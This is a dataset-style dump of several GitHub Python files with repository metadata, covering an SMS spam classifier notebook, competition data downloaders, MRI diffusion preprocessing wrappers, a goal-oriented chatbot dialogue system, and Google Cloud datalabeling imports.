blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 3 281 | content_id stringlengths 40 40 | detected_licenses listlengths 0 57 | license_type stringclasses 2 values | repo_name stringlengths 6 116 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringclasses 313 values | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 18.2k 668M ⌀ | star_events_count int64 0 102k | fork_events_count int64 0 38.2k | gha_license_id stringclasses 17 values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 107 values | src_encoding stringclasses 20 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 4 6.02M | extension stringclasses 78 values | content stringlengths 2 6.02M | authors listlengths 1 1 | author stringlengths 0 175 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
7a665298381445c06ef1d20f617d8015614e5e5f | b8678e44ac58e72134a73b1d6cdb5ee461001910 | /Spam Ham | e81130a204541a0fcb15863eb2efe1192859821f | [] | no_license | pradepkaushik/Email-Classification-Model | 975a91e3cbd048add6359a14217f469560dd64f5 | 12d121118a4e0994b20b60fd57ded1ddbf1e53ce | refs/heads/master | 2021-04-23T17:23:43.129601 | 2020-03-25T10:14:10 | 2020-03-25T10:14:10 | 249,945,464 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,412 | #!/usr/bin/env python
# coding: utf-8
# In[1]:
import nltk
# In[ ]:
nltk.download_shell()
# In[3]:
messages = [line.rstrip() for line in open('SMSSpamCollection')]
# In[4]:
messages[0]
# In[6]:
import pandas as pd
# In[7]:
import seaborn as sns
sns.set_style('whitegrid')
# In[8]:
messages = pd.read_csv('SMSSpamCollection',sep='\t',names=['label','message'])
# In[9]:
messages.head()
# In[10]:
messages['length'] = messages['message'].apply(len)
# In[11]:
messages.head()
# In[12]:
import matplotlib.pyplot as plt
get_ipython().run_line_magic('matplotlib', 'inline')
# In[13]:
messages['length'].plot.hist(bins=100)
# In[15]:
messages.hist(column='length',by='label',bins=50,figsize=(14,6))
# In[17]:
import string
# In[18]:
from nltk.corpus import stopwords
# In[ ]:
# In[20]:
mess = 'Sample message! Notice: it has punctuation.'
# In[21]:
nopunc = [c for c in mess if c not in string.punctuation]
# In[24]:
nopunc = ''.join(nopunc)
# In[25]:
nopunc
# In[26]:
nopunc.split()
# In[27]:
clean_mess = [word for word in nopunc.split() if word.lower() not in stopwords.words('english')]
# In[28]:
clean_mess
# In[35]:
def text_process(messages):
'''
1. Remove punctuation
2. Remove stopwords
3. Return list of clean words
'''
nopunc= [char for char in messages if char not in string.punctuation]
nopunc = ''.join(nopunc)
return [word for word in nopunc.split() if word.lower() not in stopwords.words('english')]
# In[36]:
messages['message'].head(5).apply(text_process)
# In[37]:
from sklearn.feature_extraction.text import CountVectorizer
# In[63]:
bow_transformer = CountVectorizer(analyzer=text_process).fit(messages['message'])
# In[66]:
print(len(bow_transformer.vocabulary_))
# In[67]:
mess4 = messages['message'][3]
# In[68]:
mess4
# In[70]:
bow4 = bow_transformer.transform([mess4])
# In[71]:
print(bow4)
# In[45]:
print(bgw4.shape)
# In[72]:
messages_bow = bow_transformer.transform(messages['message'])
# In[73]:
print(messages_bow.shape)
# In[74]:
from sklearn.feature_extraction.text import TfidfTransformer
# In[94]:
tfid_transformer = TfidfTransformer().fit(messages_bow)
# In[95]:
tfid4 = tfid.transform(bow4)
# In[96]:
print(tfid4)
# In[100]:
tfid_transformer.idf_[bow_transformer.vocabulary_['university']]
# In[86]:
message_tfid = tfid.transform(messages_bow)
# In[87]:
from sklearn.naive_bayes import MultinomialNB
# In[88]:
spam_detector = MultinomialNB().fit(message_tfid,messages['label'])
# In[89]:
spam_detector.predict(tfid4)[0]
# In[90]:
all_pred = spam_detector.predict(message_tfid)
# In[91]:
all_pred
# In[101]:
from sklearn.cross_validation import train_test_split
# In[102]:
msg_train,msg_test,label_train,label_test = train_test_split(messages['message'],messages['label'],test_size=0.3)
# In[92]:
from sklearn.pipeline import Pipeline
# In[103]:
pipeline = Pipeline([
('bow',CountVectorizer(analyzer=text_process)),
('tfid',TfidfTransformer()),
('classifier',MultinomialNB())
])
# In[104]:
pipeline.fit(msg_train,label_train)
# In[107]:
predictions = pipeline.predict(msg_test)
# In[106]:
from sklearn.metrics import classification_report
# In[109]:
print(classification_report(label_test,predictions))
| [
"noreply@github.com"
] | noreply@github.com | |
ebb1c2cb7e3f2ab45f7cd3db4f3dd927b65ec36c | 58959a269778e07af98a32475f34ce7ea3c95755 | /src/data/download_data.py | 0f79a0344682bbe642616faff16e4ac064ebf91c | [
"BSD-3-Clause"
] | permissive | chandpes/force_2020_lith | a48b5c1f73034ed6c4490130f66f1d17fb67ebea | 37900b243d5e76aff90c55a296b01ff710c12df6 | refs/heads/main | 2023-03-05T05:14:00.481004 | 2021-02-14T17:00:18 | 2021-02-14T17:00:18 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,436 | py | import pandas as pd
import gdown
from src.definitions import ROOT_DIR
OUTPUT_ROOT = ROOT_DIR / 'data/external'
if not OUTPUT_ROOT.is_dir():
OUTPUT_ROOT.mkdir(parents=True)
def download_from_google_drive(file_ids, output_root=None, redownload=False):
"""
Download the seleced files from Google Drive using their Google Drive IDs.
Parameters
----------
file_ids : dict
Dictionary with file name with extension as key and file's Google
drive ID as value.
output_root: path like
Directory to store the downloaded data.
redownload: bool
Download the file even if it already exists.
"""
if output_root is None:
output_root = OUTPUT_ROOT
url_root = "https://drive.google.com/uc?id="
for file_name, file_id in file_ids.items():
output = output_root / file_name
# Skip file if already downloaded
if output.exists():
if not redownload:
continue
url = url_root + file_id
gdown.download(url, str(output))
return
def download_competition_files():
"""
Download the competition files from Google Drive using their Google
Drive IDs.
"""
file_ids = {
# "Well log competion rules and description": "1Q_Z7xDREeTGqXvdmFuZ89e6PXN4I1miPLq1I17MTkds",
"Confusion matrix all submitters.xlsx": "1f4DZPmwJFPG7hScEX_S2RbLdOF4IOH_U",
"CSV_hidden_test.csv": "1PLWXrUQKmwMchAmcoJos0lmAm9MLEFnW",
"CSV_test.csv": "17W3I_XfI0JlJ4mLJVtz4rGa0eZKWZ6Xv",
"CSV_train.csv": "1hwDi05hwICWf95SOlofdKKYZUH79ReOa",
"lithology scoring matrix cost function.xlsx": "11Hx1KBCy3vMWzzyqdVumZxIP37qi6kEZ",
"NPD_Casing_depth_most_wells.xlsx": "10HjgB3f1_VpGjTiFPjJs37r6QYLX5T9T",
"NPD_Lithostratigraphy_groups_all_wells.xlsx": "19oTHTNg5jXsss8sElbXQZtjJrJRaffku",
"NPD_Lithostratigraphy_member_formations_all_wells.xlsx": "1X57eNXWW0_ilNO_ISvC6uz1o2OsPDZRP",
"penalty_matrix.npy": "1eCH2LBFywpgopOcHG0RLGXEtBKb7LHhM",
"starter_notebook.ipynb": "1uYG70pz2hh2nmgo6f3Hdg_IxQmyRGWEb",
"Well logs abbreviation description.xlsx": "1EOxhQicZC5X-tbPwojvWxsHjst7IcIsy",
"olawale_hidden_test_pred.csv": "16w0E1QPIdCDdoJRgAXQzqSPJ5eywQyMl",
"olawale_open_test_pred.csv": "1--4oofS0p0tvLriRLs1UhkkbxaKdxlBO",
}
download_from_google_drive(file_ids)
return
def download_well_meta():
"""
Download well meta data from Norwegian Petroleum Directorate (NPD).
"""
well_meta_url = 'https://factpages.npd.no/ReportServer_npdpublic?/FactPages/TableView/wellbore_exploration_all&rs:Command=Render&rc:Toolbar=false&rc:Parameters=f&rs:Format=CSV&Top100=false&IpAddress=not_used&CultureCode=en'
well_meta = pd.read_csv(well_meta_url)
well_meta_path = OUTPUT_ROOT / 'well_meta_npd.csv'
well_meta.to_csv(well_meta_path, index=False)
def download_open_test_labels():
"""
Download the open test set true labels.
"""
url = 'https://github.com/bolgebrygg/Force-2020-Machine-Learning-competition/raw/master/lithology_competition/data/leaderboard_test_target.csv'
test_y_true = pd.read_csv(url, sep=';')
test_y_true_path = OUTPUT_ROOT / 'open_test_y_true.csv'
test_y_true.to_csv(test_y_true_path, index=False)
if __name__ == "__main__":
download_competition_files()
download_well_meta()
download_open_test_labels()
| [
"rafaelpinto.ve@gmail.com"
] | rafaelpinto.ve@gmail.com |
8f7c0b2b78a2a7b2d1cc56c7aa2ed1e4e1c9ee1e | 8ab7d7ed4c0a5dd97b0116aed96bc97d172f6fe6 | /utils/tools.py | 1a091031f1e4b02bf35124b6860b5210cf2c3a02 | [] | no_license | gsroberts1/UWAsthmaDiffusionProcessing | 23438d323eed84b1fbae8a339d29431b0d7c34c9 | 379b1839732f24821a148eed74523f145aa396fc | refs/heads/master | 2022-12-09T08:10:29.923142 | 2020-09-09T18:01:41 | 2020-09-09T18:01:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,386 | py | import string, os, sys, subprocess, shutil, time
from glob import glob
import numpy as np
import nibabel as nib
from dipy.segment.mask import median_otsu
from dipy.denoise.nlmeans import nlmeans
from dipy.denoise.noise_estimate import estimate_sigma
from dipy.io import read_bvals_bvecs
from dipy.io.bvectxt import reorient_vectors
def calculate_mean_img(input_img, output_img):
img = nib.load(input_img)
data = img.get_data()
mean_data = np.mean(data, 3)
mean_img = nib.Nifti1Image(mean_data.astype(np.float32), img.affine, img.header)
mean_img.set_sform(img.get_sform())
mean_img.set_qform(img.get_qform())
nib.save(mean_img , output_img)
def create_target_img(input_img, output_img, index=0):
img = nib.load(input_img)
data = img.get_data()
target_img = nib.Nifti1Image(data[:,:,:, index].astype(np.float32), img.affine, img.header)
target_img.set_sform(img.get_sform())
target_img.set_qform(img.get_qform())
nib.save(target_img, output_img)
def n4_bias_correct(input_img, output_img):
os.system('N4BiasFieldCorrection -d 3 -i ' + input_img + ' -o ' + output_img)
def bias_correct_mrtrix(input_img, input_mask, output_img, method='-ants', input_bval='', input_bvec='', nthreads='0'):
command='dwibiascorrect -mask ' + input_mask + ' ' + method
if input_bval != '' and input_bvec != '':
command += ' -fslgrad ' + input_bvec + ' ' + input_bval + ' '
command += ' -force -quiet -nthreads ' + nthreads + ' ' + input_img + ' ' + output_img
os.system(command)
def denoise_mrtrix(input_dwi, output_dwi, output_noise='', nthreads='0'):
#This function uses MRTRix function dwidenoise to remove noise from images
if(output_noise != ''):
os.system('dwidenoise ' + input_dwi + ' ' + output_dwi + ' -noise ' + output_noise + ' -nthreads ' + nthreads + ' -quiet -force')
else:
os.system('dwidenoise ' + input_dwi + ' ' + output_dwi + ' -quiet -force')
def mrdegibbs_mrtrix(input_dwi, output_dwi, nthreads='0'):
#This function uses MRTRix to perform Gibbs ringing correction
os.system('mrdegibbs ' + input_dwi + ' ' + output_dwi + ' -nthreads ' + nthreads + ' -quiet -force')
def denoise_dipy(input_dwi, input_bval, input_bvec, mask_image, output_dwi):
#This function uses nlmeans as part of dipy to remove noise from images
img = nib.load(input_dwi)
data = img.get_data()
mask = nib.load(mask_image).get_data()
aff = img.get_affine()
sform = img.get_sform()
qform = img.get_qform()
bvals, bvecs = read_bvals_bvecs(input_bval, input_bvec)
values = np.array(bvals)
ii = np.where(values == bvals.min())[0]
sigma = estimate_sigma(data)
sigma = np.mean(sigma[ii])
den = nlmeans(data,sigma=sigma, mask=mask)
den_img = nib.Nifti1Image(den.astype(np.float32), aff, img.header)
den_img.set_sform(sform)
den_img.set_qform(qform)
nib.save(den_img, output_dwi)
def correct_header_orientation(img_path, new_x, new_y, new_z):
img = nib.load(img_path)
sform = img.get_sform()
qform = img.get_qform()
new_sform = img.get_sform()
new_qform = img.get_qform()
if new_x == 'y':
new_sform[0] = sform[1]
new_qform[0] = qform[1]
if new_x == '-y':
new_sform[0] = -1.00*sform[1]
new_qform[0] = -1.00*qform[1]
if new_x == 'z':
new_sform[0] = sform[2]
new_qform[0] = qform[2]
if new_x == '-z':
new_sform[0] = -1.00*sform[2]
new_qform[0] = -1.00*qform[2]
if new_y == 'x':
new_sform[1] = sform[0]
new_qform[1] = qform[0]
if new_y == '-x':
new_sform[1] = -1.00*sform[0]
new_qform[1] = -1.00*qform[0]
if new_y == 'z':
new_sform[1] = sform[2]
new_qform[1] = qform[2]
if new_y == '-z':
new_sform[1] = -1.00*sform[2]
new_qform[1] = -1.00*qform[2]
if new_z == 'x':
new_sform[2] = sform[0]
new_qform[2] = qform[0]
if new_z == '-x':
new_sform[2] = -1.00*sform[0]
new_qform[2] = -1.00*qform[0]
if new_z == 'y':
new_sform[2] = sform[1]
new_qform[2] = qform[1]
if new_z == '-y':
new_sform[2] = -1.00*sform[1]
new_qform[2] = -1.00*qform[1]
out_img = img
out_img.set_sform(new_sform)
out_img.set_qform(new_qform)
out_img.to_filename(img_path)
| [
"noreply@github.com"
] | noreply@github.com |
bed29e9ff8152098f941c3ec5f2d8c4d3a7581b0 | 99040574b2d19995330f5e58bc90133d671b1b13 | /Production/GO-Chatbots/core/dm/dialogue_system.py | 9210c28a99a9dcda564dc7a8ecc3a7d0032d7333 | [
"MIT"
] | permissive | IlievskiV/Master_Thesis_GO_Chatbots | acc94cf023f5bd49186738d4e4dfeadda17f1bce | 6fbba12afbbf51b7a6b6067e9448e5ef673fda16 | refs/heads/master | 2021-04-06T10:03:03.290786 | 2018-03-16T13:10:35 | 2018-03-16T13:10:35 | 125,334,116 | 13 | 4 | null | null | null | null | UTF-8 | Python | false | false | 7,374 | py | """
Author: Vladimir Ilievski <ilievski.vladimir@live.com>
A Python file for the entire Goal-Oriented Dialogue System.
"""
from core import constants as const
from core.environment.environment import GOEnv
import core.agent.agents as agents
from core.agent.processor import GOProcessor
from core.dm.kb_helper import GOKBHelper
import cPickle as pickle
import logging
from keras.optimizers import Adam
from rl.callbacks import FileLogger, ModelIntervalCheckpoint
class GODialogSys(object):
"""
The GO Dialogue System mediates the interaction between the environment and the agent.
# Class members:
- ** agent **: the type of conversational agent. Default is None (temporarily).
- ** environment **: the environment with which the agent and user interact. Default is None (temporarily).
- ** act_set **: static set of all dialogue acts (intents) used in the dialogue. This set includes the following:
- ** request **: the dialogue turn is requesting a value for some slots
- ** inform **: the dialogue turn is providing values (constraints) for some values
- ** confirm_question **:
- ** confirm_answer **:
- ** greeting **: the turn does not provide any info else than a greeting
- ** closing **: the turn
- ** multiple_choice **: when the turn includes
- ** thanks **: the turn does not provide any info else than a thanks words
- ** welcome **: the turn does not provide any info else than a welcoming words
- ** deny **:
- ** not_sure **:
- ** slot_set **: the set of all slots used in the dialogue.
- ** knowledge_dict_path **: path to any knowledge dictionary for the database
- ** agt_feasible_actions **: list of templates described as dictionaries, corresponding to each action the agent might take
(dict to be specified)
- ** max_nb_turns **: the maximal number of dialogue turns
- ** ultimate_request_slot **: the slot that is the actual goal of the user, and everything is around this slot.
"""
def __init__(self, act_set=None, slot_set=None, goal_set=None, init_inform_slots=None, ultimate_request_slot=None,
kb_special_slots=None, kb_filter_slots=None, agt_feasible_actions=None, agt_memory=None,
agt_policy=None, agt_warmup_policy=None, agt_eval_policy=None, params=None):
"""
Constructor of the class.
"""
logging.info('Calling `GODialogSys` constructor')
# Initialize the act set and slot set
self.act_set = act_set
self.slot_set = slot_set
self.goal_set = goal_set
self.init_inform_slots = init_inform_slots
self.ultimate_request_slot = ultimate_request_slot
self.kb_special_slots = kb_special_slots
self.kb_filter_slots = kb_filter_slots
# maximal number of turns
self.max_nb_turns = params[const.MAX_NB_TURNS]
# create the knowledge base helper class
self.knowledge_dict = pickle.load(open(params[const.KB_PATH_KEY], 'rb'))
self.kb_helper = GOKBHelper(self.ultimate_request_slot, self.kb_special_slots, self.kb_filter_slots,
self.knowledge_dict)
self.agt_feasible_actions = agt_feasible_actions
# create the environment
self.env = self.__create_env(params)
# agent-related
self.go_processor = GOProcessor(feasible_actions=self.agt_feasible_actions)
self.nb_actions = len(self.agt_feasible_actions)
self.agt_memory = agt_memory
self.gamma = params[const.GAMMA_KEY]
self.batch_size = params[const.BATCH_SIZE_KEY]
self.nb_steps_warmup = params[const.NB_STEPS_WARMUP_KEY]
self.train_interval = params[const.TRAIN_INTERVAL_KEY]
self.memory_interval = params[const.MEMORY_INTERVAL_KEY]
self.target_model_update = params[const.TARGET_MODEL_UPDATE_KEY]
self.agt_policy = agt_policy
self.agt_warmup_policy = agt_warmup_policy
self.agt_eval_policy = agt_eval_policy
self.enable_double_dqn = params[const.ENABLE_DOUBLE_DQN_KEY]
self.enable_dueling_network = params[const.ENABLE_DUELING_NETWORK_KEY]
self.dueling_type = params[const.DUELING_TYPE_KEY]
self.state_dimension = self.env.get_state_dimension()
self.hidden_size = params[const.HIDDEN_SIZE_KEY]
self.act_func = params[const.ACTIVATION_FUNCTION_KEY]
# create the specified agent type
self.agent = self.__create_agent(params)
def __create_env(self, params):
"""
Private helper method for creating an environment given the parameters.
# Arguments:
- ** params **: the params for creating the environment
** return **: the newly created environment
"""
logging.info('Calling `GODialogSys` __create_env method')
# Create the environment
env = GOEnv(self.act_set, self.slot_set, self.goal_set, self.init_inform_slots, self.ultimate_request_slot,
self.agt_feasible_actions, self.kb_helper, params)
return env
def __create_agent(self, params):
"""
Private helper method for creating an agent depending on the given type as a string.
:return: the newly created agent
"""
logging.info('Calling `GODialogSys` __create_agent method')
agent = None
agent_type_value = params[const.AGENT_TYPE_KEY]
if agent_type_value == const.AGENT_TYPE_DQN:
agent = agents.GODQNAgent(processor=self.go_processor, nb_actions=self.nb_actions, memory=self.agt_memory,
gamma=self.gamma, batch_size=self.batch_size,
nb_steps_warmup=self.nb_steps_warmup,
train_interval=self.train_interval, memory_interval=self.memory_interval,
target_model_update=self.target_model_update, policy=self.agt_policy,
warmup_policy=self.agt_warmup_policy,
eval_policy=self.agt_eval_policy, enable_double_dqn=self.enable_double_dqn,
enable_dueling_network=self.enable_dueling_network,
dueling_type=self.dueling_type,
output_dim=self.nb_actions, state_dimension=self.state_dimension,
hidden_size=self.hidden_size, act_func=self.act_func)
agent.compile(Adam(lr=.00025), metrics=['mae'])
return agent
def train(self, nb_epochs, nb_warmup_episodes, nb_episodes_per_epoch, res_path, weights_file_name):
"""
Method for training the system.
# Arguments:
"""
self.agent.fit(env=self.env, nb_epochs=nb_epochs, nb_warmup_episodes=nb_warmup_episodes,
nb_episodes_per_epoch=nb_episodes_per_epoch, res_path=res_path)
self.agent.save_weights(weights_file_name, overwrite=True)
def initialize(self):
"""
Method for initializing the dialogue
"""
| [
"ilievski.vladimir@live.com"
] | ilievski.vladimir@live.com |
b3d2499cc45fea03a267a459dd73d738e8962baa | 601362aea0d323309bea046d93ef3f2abe090718 | /flog/libs/wikipedia.py | b8f67543bdc12c2b8f795d5ecf414fb4fbf6e2b9 | [] | no_license | ErikBurdett/flog | cca1d780835351b7017b993e4047d43a437c6504 | 633bd3ff95b62766fcf40d76513d27b8785870a0 | refs/heads/master | 2022-10-30T17:01:31.538700 | 2020-06-16T04:40:14 | 2020-06-16T04:40:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 157 | py | import requests
def random_article():
url = f'https://en.wikipedia.org/api/rest_v1/page/random/title'
return requests.get(url, timeout=2.0).json()
| [
"randy@thesyrings.us"
] | randy@thesyrings.us |
cd6c4622e3513f55a114eb7fc77c82980c625ac0 | b93f31825ed08966b2b617552b5e79ce696dc9cf | /create_database.py | e6b8fa494e56f56f5a03148782bc6dd4f09c6612 | [] | no_license | ngangavic/pythonsamples | 3bc59eaee33abc044dd586dae1d05a85508b78c4 | b916e8f269716739d0b8dc65e0a695f9c1470b80 | refs/heads/master | 2020-07-28T22:47:15.799435 | 2019-09-19T14:48:17 | 2019-09-19T14:48:17 | 209,566,775 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 136 | py | import demo_mysql_connector
#create database
cursor = demo_mysql_connector.database.cursor()
cursor.execute("CREATE DATABASE pythondb") | [
"ngangavictor10@gmail.com"
] | ngangavictor10@gmail.com |
86436b8a697389fde7ff1382bfff97f0629c044f | 37b92cfbbfbd9d1ab40db7350232e5cb763d852b | /Single_Server/assets/status.py | 7a3260b45096a4abf3187da982ed577c739a0eb2 | [] | no_license | karenbocardo/com139-class | 9bd1e4d83fd31ff76496141b29e23bf4efc665ea | aa60f1fd226663de37ea781e4167af156de96898 | refs/heads/master | 2023-06-09T17:09:56.048808 | 2021-06-29T05:27:36 | 2021-06-29T05:27:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 348 | py | from enum import Enum
class Status(Enum):
"""An enumeration of the gen_customer states"""
UNDEFINED = 0, 'UNDEFINED state. (Not in use)'
SUCCESS = 1, 'SUCCESS state.'
WAIT = 2, 'WAITING state.'
RENEGED = 3, 'RENEGED state. Used when the gen_customer is tired of waiting'
def __str__(self):
return str(self.name)
| [
"gacastil@up.edu.mx"
] | gacastil@up.edu.mx |
810bf355ace92ebc37e0d77e7bf8b58519ee67c4 | be0388dfda0602ae49eb6bd4efe24703f7288cf2 | /google/cloud/datalabeling/__init__.py | dbfce79fa39bb5622d98a9a16c979c2ba602ff41 | [
"Apache-2.0"
] | permissive | renovate-bot/python-datalabeling | 3211e3f71bba67a8272d48492abdbaa75def3a54 | f2d2282ae971ac946de166c6449e923bc94432cb | refs/heads/master | 2023-06-08T06:38:30.633651 | 2021-08-13T15:31:29 | 2021-08-13T15:31:29 | 237,521,154 | 0 | 0 | Apache-2.0 | 2020-01-31T21:43:01 | 2020-01-31T21:43:00 | null | UTF-8 | Python | false | false | 17,802 | py | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from google.cloud.datalabeling_v1beta1.services.data_labeling_service.client import (
DataLabelingServiceClient,
)
from google.cloud.datalabeling_v1beta1.services.data_labeling_service.async_client import (
DataLabelingServiceAsyncClient,
)
from google.cloud.datalabeling_v1beta1.types.annotation import Annotation
from google.cloud.datalabeling_v1beta1.types.annotation import AnnotationMetadata
from google.cloud.datalabeling_v1beta1.types.annotation import AnnotationValue
from google.cloud.datalabeling_v1beta1.types.annotation import BoundingPoly
from google.cloud.datalabeling_v1beta1.types.annotation import (
ImageBoundingPolyAnnotation,
)
from google.cloud.datalabeling_v1beta1.types.annotation import (
ImageClassificationAnnotation,
)
from google.cloud.datalabeling_v1beta1.types.annotation import ImagePolylineAnnotation
from google.cloud.datalabeling_v1beta1.types.annotation import (
ImageSegmentationAnnotation,
)
from google.cloud.datalabeling_v1beta1.types.annotation import NormalizedBoundingPoly
from google.cloud.datalabeling_v1beta1.types.annotation import NormalizedPolyline
from google.cloud.datalabeling_v1beta1.types.annotation import NormalizedVertex
from google.cloud.datalabeling_v1beta1.types.annotation import ObjectTrackingFrame
from google.cloud.datalabeling_v1beta1.types.annotation import OperatorMetadata
from google.cloud.datalabeling_v1beta1.types.annotation import Polyline
from google.cloud.datalabeling_v1beta1.types.annotation import SequentialSegment
from google.cloud.datalabeling_v1beta1.types.annotation import (
TextClassificationAnnotation,
)
from google.cloud.datalabeling_v1beta1.types.annotation import (
TextEntityExtractionAnnotation,
)
from google.cloud.datalabeling_v1beta1.types.annotation import TimeSegment
from google.cloud.datalabeling_v1beta1.types.annotation import Vertex
from google.cloud.datalabeling_v1beta1.types.annotation import (
VideoClassificationAnnotation,
)
from google.cloud.datalabeling_v1beta1.types.annotation import VideoEventAnnotation
from google.cloud.datalabeling_v1beta1.types.annotation import (
VideoObjectTrackingAnnotation,
)
from google.cloud.datalabeling_v1beta1.types.annotation import AnnotationSentiment
from google.cloud.datalabeling_v1beta1.types.annotation import AnnotationSource
from google.cloud.datalabeling_v1beta1.types.annotation import AnnotationType
from google.cloud.datalabeling_v1beta1.types.annotation_spec_set import AnnotationSpec
from google.cloud.datalabeling_v1beta1.types.annotation_spec_set import (
AnnotationSpecSet,
)
from google.cloud.datalabeling_v1beta1.types.data_labeling_service import (
CreateAnnotationSpecSetRequest,
)
from google.cloud.datalabeling_v1beta1.types.data_labeling_service import (
CreateDatasetRequest,
)
from google.cloud.datalabeling_v1beta1.types.data_labeling_service import (
CreateEvaluationJobRequest,
)
from google.cloud.datalabeling_v1beta1.types.data_labeling_service import (
CreateInstructionRequest,
)
from google.cloud.datalabeling_v1beta1.types.data_labeling_service import (
DeleteAnnotatedDatasetRequest,
)
from google.cloud.datalabeling_v1beta1.types.data_labeling_service import (
DeleteAnnotationSpecSetRequest,
)
from google.cloud.datalabeling_v1beta1.types.data_labeling_service import (
DeleteDatasetRequest,
)
from google.cloud.datalabeling_v1beta1.types.data_labeling_service import (
DeleteEvaluationJobRequest,
)
from google.cloud.datalabeling_v1beta1.types.data_labeling_service import (
DeleteInstructionRequest,
)
from google.cloud.datalabeling_v1beta1.types.data_labeling_service import (
ExportDataRequest,
)
from google.cloud.datalabeling_v1beta1.types.data_labeling_service import (
GetAnnotatedDatasetRequest,
)
from google.cloud.datalabeling_v1beta1.types.data_labeling_service import (
GetAnnotationSpecSetRequest,
)
from google.cloud.datalabeling_v1beta1.types.data_labeling_service import (
GetDataItemRequest,
)
from google.cloud.datalabeling_v1beta1.types.data_labeling_service import (
GetDatasetRequest,
)
from google.cloud.datalabeling_v1beta1.types.data_labeling_service import (
GetEvaluationJobRequest,
)
from google.cloud.datalabeling_v1beta1.types.data_labeling_service import (
GetEvaluationRequest,
)
from google.cloud.datalabeling_v1beta1.types.data_labeling_service import (
GetExampleRequest,
)
from google.cloud.datalabeling_v1beta1.types.data_labeling_service import (
GetInstructionRequest,
)
from google.cloud.datalabeling_v1beta1.types.data_labeling_service import (
ImportDataRequest,
)
from google.cloud.datalabeling_v1beta1.types.data_labeling_service import (
LabelImageRequest,
)
from google.cloud.datalabeling_v1beta1.types.data_labeling_service import (
LabelTextRequest,
)
from google.cloud.datalabeling_v1beta1.types.data_labeling_service import (
LabelVideoRequest,
)
from google.cloud.datalabeling_v1beta1.types.data_labeling_service import (
ListAnnotatedDatasetsRequest,
)
from google.cloud.datalabeling_v1beta1.types.data_labeling_service import (
ListAnnotatedDatasetsResponse,
)
from google.cloud.datalabeling_v1beta1.types.data_labeling_service import (
ListAnnotationSpecSetsRequest,
)
from google.cloud.datalabeling_v1beta1.types.data_labeling_service import (
ListAnnotationSpecSetsResponse,
)
from google.cloud.datalabeling_v1beta1.types.data_labeling_service import (
ListDataItemsRequest,
)
from google.cloud.datalabeling_v1beta1.types.data_labeling_service import (
ListDataItemsResponse,
)
from google.cloud.datalabeling_v1beta1.types.data_labeling_service import (
ListDatasetsRequest,
)
from google.cloud.datalabeling_v1beta1.types.data_labeling_service import (
ListDatasetsResponse,
)
from google.cloud.datalabeling_v1beta1.types.data_labeling_service import (
ListEvaluationJobsRequest,
)
from google.cloud.datalabeling_v1beta1.types.data_labeling_service import (
ListEvaluationJobsResponse,
)
from google.cloud.datalabeling_v1beta1.types.data_labeling_service import (
ListExamplesRequest,
)
from google.cloud.datalabeling_v1beta1.types.data_labeling_service import (
ListExamplesResponse,
)
from google.cloud.datalabeling_v1beta1.types.data_labeling_service import (
ListInstructionsRequest,
)
from google.cloud.datalabeling_v1beta1.types.data_labeling_service import (
ListInstructionsResponse,
)
from google.cloud.datalabeling_v1beta1.types.data_labeling_service import (
PauseEvaluationJobRequest,
)
from google.cloud.datalabeling_v1beta1.types.data_labeling_service import (
ResumeEvaluationJobRequest,
)
from google.cloud.datalabeling_v1beta1.types.data_labeling_service import (
SearchEvaluationsRequest,
)
from google.cloud.datalabeling_v1beta1.types.data_labeling_service import (
SearchEvaluationsResponse,
)
from google.cloud.datalabeling_v1beta1.types.data_labeling_service import (
SearchExampleComparisonsRequest,
)
from google.cloud.datalabeling_v1beta1.types.data_labeling_service import (
SearchExampleComparisonsResponse,
)
from google.cloud.datalabeling_v1beta1.types.data_labeling_service import (
UpdateEvaluationJobRequest,
)
from google.cloud.datalabeling_v1beta1.types.data_payloads import ImagePayload
from google.cloud.datalabeling_v1beta1.types.data_payloads import TextPayload
from google.cloud.datalabeling_v1beta1.types.data_payloads import VideoPayload
from google.cloud.datalabeling_v1beta1.types.data_payloads import VideoThumbnail
from google.cloud.datalabeling_v1beta1.types.dataset import AnnotatedDataset
from google.cloud.datalabeling_v1beta1.types.dataset import AnnotatedDatasetMetadata
from google.cloud.datalabeling_v1beta1.types.dataset import BigQuerySource
from google.cloud.datalabeling_v1beta1.types.dataset import ClassificationMetadata
from google.cloud.datalabeling_v1beta1.types.dataset import DataItem
from google.cloud.datalabeling_v1beta1.types.dataset import Dataset
from google.cloud.datalabeling_v1beta1.types.dataset import Example
from google.cloud.datalabeling_v1beta1.types.dataset import GcsDestination
from google.cloud.datalabeling_v1beta1.types.dataset import GcsFolderDestination
from google.cloud.datalabeling_v1beta1.types.dataset import GcsSource
from google.cloud.datalabeling_v1beta1.types.dataset import InputConfig
from google.cloud.datalabeling_v1beta1.types.dataset import LabelStats
from google.cloud.datalabeling_v1beta1.types.dataset import OutputConfig
from google.cloud.datalabeling_v1beta1.types.dataset import TextMetadata
from google.cloud.datalabeling_v1beta1.types.dataset import DataType
from google.cloud.datalabeling_v1beta1.types.evaluation import (
BoundingBoxEvaluationOptions,
)
from google.cloud.datalabeling_v1beta1.types.evaluation import ClassificationMetrics
from google.cloud.datalabeling_v1beta1.types.evaluation import ConfusionMatrix
from google.cloud.datalabeling_v1beta1.types.evaluation import Evaluation
from google.cloud.datalabeling_v1beta1.types.evaluation import EvaluationConfig
